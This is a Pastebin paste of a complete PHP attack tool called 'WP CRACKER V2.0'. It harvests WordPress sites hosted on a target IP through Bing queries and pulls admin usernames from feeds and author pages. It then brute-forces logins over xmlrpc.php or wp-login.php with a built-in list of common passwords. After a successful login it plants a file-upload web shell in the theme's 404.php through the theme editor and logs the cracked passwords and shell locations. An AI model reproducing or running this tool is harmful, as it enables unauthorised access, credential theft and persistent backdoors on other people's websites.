API tools faq
paste
View difference between Paste ID: RC1WCSKX and zrqJJPqF
SHOW: | | - or go back to the newest paste.
1
<html>
2
<title>WP CRACKER V2.0</title>
3
<style>
4
body{background-color:#f1f1f1;}
5
input,select,textarea{
6
	border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
7
}
8
</style>
9
<center>
10
<table cellpadding='5'>
11
<tr><td align=center><h2>WP CRACKER V2.0</h2></td></tr>
12
<?php
13
#WP CRACKER V2.0
14
#INJ3CTOR_M4
15
@set_time_limit(0);
16
error_reporting(0);
17
18
if(!isset($_POST['brute'])){

19
	echo'<tr><td align="center">';

20
	echo'<b>Server iP:</b>';

21
	echo'<form method="POST">';

22
	echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">';

23
	echo'<input type="submit" value="Grab_WP!"></td></tr></table>';

24
	echo'<table cellpadding="5">';

25
	echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>';

26
	if(!isset($_POST['ip'])){

27
		echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';

28
	}else{

29
		$ip = trim($_POST['ip']);

30
		$dorks = array('/?page_id=', '/?p=');

31
		foreach($dorks as $dork){

32
			$query = "ip:$ip $dork";

33
			$allLinks = bingServerCrawler($query);

34
			foreach($allLinks as $link){

35
				if(eregi("page_id=|p=", $link)){	$link = pathinfo($link)['dirname'];

36
					$data = get_source($link	.	"/wp-includes/wlwmanifest.xml");

37
					if(preg_match('#<clientType>WordPress</clientType>#i', $data)){

38
						$wpLinks[] = $link;

39
					}

40
				}

41
			}

42
		}

43
		if(!empty($wpLinks)){	$wpLinks = array_unique($wpLinks);

44
			echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">';

45
			foreach($wpLinks as $wordpress){

46
				echo $wordpress	."\r\n";

47
			}

48
			echo'</textarea></td>';

49
		}

50
	}

51
	echo'<td><textarea name="passwords" cols="32" rows="23">';

52
echo'

53
00000

54
000000

55
0000000

56
00000000

57
0123456789

58
102030

59
111111

60
112233

61
123

62
123123

63
12345

64
123456

65
1234567

66
12345678

67
123456789

68
321321

69
654321

70
admin

71
adminadmin

72
admin123

73
admin123123

74
admin1234

75
admin123456

76
administrator

77
abc123

78
demo

79
qwerty

80
qwerty123

81
passwd

82
password

83
p@ssw0rd

84
passw0rd

85
passwords

86
pass123

87
pass121

88
pass

89
pass1234

90
test

91
test123

92
root

93
toor

94
user

95
welcome1

96
welcome

97
';

98
	echo'</textarea></td></tr></table>';

99
	echo'<table cellpadding="5">';

100
	echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>';

101
}else{

102
	$sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites'])));

103
	$passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords'])));

104
	$f = fopen('rezult.html', 'a+');

105
	echo'<table border="1" cellpadding="5">';

106
	foreach($sites as $site){

107
		$site = rtrim($site, '/');

108
		vbflush(); # buffer clean

109
		echo"<tr><td><b>Target --> $site</b></td></tr>";

110
		fwrite($f, "<br />target --> <b>$site</b><br />");

111
		$user = admin_wp($site);

112
		echo"<tr><td>Username is: <b>$user</b></td>";

113
		fwrite($f, "Username: <b>$user</b><br />");

114
		foreach($passwords as $pass){

115
			if(WP_CRACKER($site, $user,$pass) == true){

116
				vbflush(); # buffer clean

117
				echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";

118
				fwrite($f, "Password: <b>$pass</b><br />");

119
				if(uploadshell($site) == true){

120
					echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";

121
					fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");

122
				}else{

123
					echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';

124
				}

125
				break;

126
			}else{

127
				vbflush(); # buffer clean

128
				echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";

129
			}

130
		}

131
	}

132
	fclose($f);

133
}

134
echo'</table>';

135
136
// Functions //

137
138
function bingServerCrawler($dork){

139
	$ch = curl_init();

140
	$i = 1;

141
	while($i){

142
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

143
		curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q="	.	urlencode($dork)	.	"&first={$i}");

144
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

145
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

146
		curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");

147
		curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");

148
		$data = curl_exec($ch);

149
		preg_match_all('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $matches);

150
		foreach($matches[1] as $link){

151
			$allLinks[] = $link;

152
		}

153
		if(!preg_match('#class="sb_pagN"#i', $data)) break;

154
		$i+=10;

155
	}

156
	curl_close($ch);

157
	if(!empty($allLinks) && is_array($allLinks)){

158
		return array_unique($allLinks);

159
	}

160
}

161
162
function get_source($link, $safemode = false, $agent){

163
	if($safemode === true) sleep(1);

164
	if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; }

165
	if(!function_exists('curl_init')){

166
		return file_get_contents($link);

167
	}else{

168
		$ch = curl_init();

169
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

170
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

171
		curl_setopt($ch, CURLOPT_URL, $link);

172
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

173
		curl_setopt($ch, CURLOPT_USERAGENT, $agent);

174
		curl_setopt($ch, CURLOPT_ENCODING, 0);

175
		curl_setopt($ch, CURLOPT_TIMEOUT, 30);

176
		$data = curl_exec($ch);

177
		curl_close($ch);

178
		

179
		return $data;

180
	}

181
}

182
183
function admin_wp($wp){

184
    $data = get_source($wp    .    "/?feed=atom");

185
    if(preg_match('#<name>(.*?)</name>#', $data, $user)){

186
        if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){

187
            return $user[1];

188
        }

189
    }else{

190
        $data = get_source($wp    .    "/?author=1");

191
        if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){

192
            return $user[1];

193
        }else{

194
            return "admin";

195
        }

196
    }

197
}

198
199
function WP_CRACKER($site, $user, $pass){

200
	$xmlprc = get_source($site	.'/xmlrpc.php');

201
	$ch = curl_init();

202
	if(preg_match('#server accepts POST#i', $xmlprc)){

203
		curl_setopt($ch, CURLOPT_URL, $site    ."/xmlrpc.php");

204
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

205
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");

206
		curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

207
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

208
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

209
		curl_setopt($ch, CURLOPT_POST, 1);

210
		curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>");

211
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

212
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

213
		$data = curl_exec($ch);

214
		return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false;

215
	}else{

216
		curl_setopt($ch, CURLOPT_URL, $site	.'/wp-login.php');

217
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

218
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");

219
		curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");

220
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

221
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

222
		curl_setopt($ch, CURLOPT_POST, 1);

223
		curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1");

224
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

225
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

226
		$data = curl_exec($ch);

227
		return (preg_match('/logout/', $data)) ? true:false;

228
	}

229
}

230
231
function uploadshell($site){

232
	$ch = curl_init();

233
	curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen');

234
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

235
	curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");

236
	curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

237
	curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

238
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

239
	$data = curl_exec($ch);

240
	curl_close($ch);

241
	if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){

242
		$post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File";

243
		$ch = curl_init();

244
		curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php');

245
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

246
		curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");

247
		curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');

248
		curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');

249
		curl_setopt($ch, CURLOPT_POST, 1);

250
		curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

251
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

252
		$data = curl_exec($ch);

253
		curl_close($ch);

254
		$data = get_source($site	.'/wp-content/themes/twentythirteen/404.php');

255
		return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false;

256
	}else{	return FALSE;	}

257
}

258
		

259
function vbflush(){

260
	static $gzip_handler = null;

261
	if($gzip_handler === null){

262
		$gzip_handler = false;

263
		$output_handlers = ob_list_handlers();

264
		if(is_array($output_handlers)){

265
			foreach($output_handlers as $handler){

266
				if($handler == 'ob_gzhandler'){

267
					$gzip_handler = true;

268
					break;

269
				}

270
			}

271
		}

272
	}

273
	if($gzip_handler){

274
	// forcing a flush with this is very bad

275
		return;

276
	}

277
	if(ob_get_length() !== false){

278
		@ob_flush();

279
	}

280
	flush();

281
}
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!